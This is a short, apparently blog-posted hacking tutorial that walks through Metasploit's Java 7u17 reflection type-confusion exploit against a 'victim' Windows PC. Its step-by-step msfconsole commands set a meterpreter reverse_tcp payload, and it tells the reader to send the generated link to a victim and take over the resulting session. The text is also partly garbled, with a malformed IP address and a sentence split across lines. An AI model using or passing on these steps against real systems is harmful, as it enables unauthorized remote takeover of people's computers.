Hack Remote Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

Java 7 Update 17

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_jre17_reflection_types

msf exploit (java_jre17_reflection_types)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (java_jre17_reflection_types)>set target 1

msf exploit (java_jre17_reflection_types)>set srvhost 192.168.0.106 (This must be an address on the local

msf exploit (java_jre17_reflection_types)>set payload windows/meterpreter/reverse_tcp

machine)

msf exploit (java_jre17_reflection_types)>exploit

Now an URL you should give to your victim http://192.168.1.0.106:8080/Mt7fUKs955I

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *